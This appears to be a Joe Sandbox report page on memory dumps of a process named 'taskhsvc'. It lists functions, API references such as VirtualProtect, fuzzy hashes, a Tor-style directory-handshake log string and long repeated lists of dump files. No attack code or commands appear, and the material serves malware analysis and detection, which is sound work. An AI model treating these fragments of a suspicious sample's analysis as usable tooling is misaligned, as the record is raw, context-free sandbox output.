Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: LibraryLoad__stack_chk_failstrcatstrlen
String ID:
API String ID: 317683016-0
Opcode ID: 791aaf5f9516dd4de8e6657b320951053bef91e04a597e4a0a736a2b8f484054
Instruction ID: 6317876f12593c6e3ae30bc4b209535dea6b98af4cbacb41394d8b48eb4e221c
Opcode Fuzzy Hash: 791aaf5f9516dd4de8e6657b320951053bef91e04a597e4a0a736a2b8f484054
Instruction Fuzzy Hash: 2C21F770E0421C8FCB14EF28C9467DDB7F1EB49304F4549A9E658E7340E674AE858F91

Uniqueness

Uniqueness Score: -1.00%

Function 00D960BC Relevance: 6.0, APIs: 4, Instructions: 48stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 00D960C8

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00E9A57C: _write.MSVCRT ref: 00E9A5E6
Part of subcall function 00E9A57C: strlen.MSVCRT ref: 00E9A62B
Part of subcall function 00E9A57C: __stack_chk_fail.LIBSSP-0 ref: 00E9A68C

strerror.MSVCRT ref: 00D96117
free.MSVCRT ref: 00D9615F
__stack_chk_fail.LIBSSP-0 ref: 00D963EC

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strerror$_writefreestrlen
String ID:
API String ID: 1662648450-0
Opcode ID: 6846f27e6137c6265157cf93e71d5940baba7a0a5fcae35cf8a4d98e5bf256f3
Instruction ID: 0c158137df18c2b0bac7619816d3363bb3cd1f60931b3e0e42c4bc98344f3c37
Opcode Fuzzy Hash: 6846f27e6137c6265157cf93e71d5940baba7a0a5fcae35cf8a4d98e5bf256f3
Instruction Fuzzy Hash: 111107709087018FDB04EF64C5897ADBBF0AF48314F18591CE095AB292C778D984DF22

Uniqueness

Uniqueness Score: -1.00%

Function 00DD8ADA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DD8D09

Strings

WARN BOOTSTRAP PROGRESS=10 TAG=handshake_dir SUMMARY="Finishing handshake with directory server" WARNING="Connection timed out [WSAETIMEDOUT ]" REASON=TIMEOUT COUNT=7 RECOMMENDATION=ignore HOSTID="47B596B81C9E6277B98623A84B7629798A16E8D5" HOSTADDR="51.254.246., xrefs: 00DD8C64
U, xrefs: 00DD8B32

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID: U$WARN BOOTSTRAP PROGRESS=10 TAG=handshake_dir SUMMARY="Finishing handshake with directory server" WARNING="Connection timed out [WSAETIMEDOUT ]" REASON=TIMEOUT COUNT=7 RECOMMENDATION=ignore HOSTID="47B596B81C9E6277B98623A84B7629798A16E8D5" HOSTADDR="51.254.246.
API String ID: 4216919130-443926559
Opcode ID: 3e6f433b5e2cd7af52fc4a335dc5441663e3c23eb807b37835a308b83510dc0d
Instruction ID: 04c4cc04be3082b9129d3a1b46b0d261e21660812fc43ce0f560899c70b3c70a
Opcode Fuzzy Hash: 3e6f433b5e2cd7af52fc4a335dc5441663e3c23eb807b37835a308b83510dc0d
Instruction Fuzzy Hash: 9F51F6B0A05258CFCB21CF19C985799BBF0FB44304F4089AAE548A7351D774AEC9EF69

Uniqueness

Uniqueness Score: -1.00%

Function 00DF3D44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DF3EFD

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DF3D94

Part of subcall function 00DF3C99: free.MSVCRT ref: 00DF3D25
Part of subcall function 00DF3C99: __stack_chk_fail.LIBSSP-0 ref: 00DF3D3D

Strings

`b, xrefs: 00DF3D7C

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abortfree
String ID: `b
API String ID: 919459091-2274916652
Opcode ID: a663a47eb35a16150eaa70bd2912b971839a32fcab8804b80bb6aa7e9a88e6dd
Instruction ID: af19b6f6d5b97fda17ed097aa3a204e30860a44f6652e6b08f0f89d2b64fe9e1
Opcode Fuzzy Hash: a663a47eb35a16150eaa70bd2912b971839a32fcab8804b80bb6aa7e9a88e6dd
Instruction Fuzzy Hash: 135192B4909309DFC740EFA9C54597EBBF0EF08304F07886AE998A7316D7759941AF22

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00FC6B00
VirtualProtect.KERNEL32 ref: 00FC6B42

Strings

@, xrefs: 00FC6B2B

Memory Dump Source

Source File: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
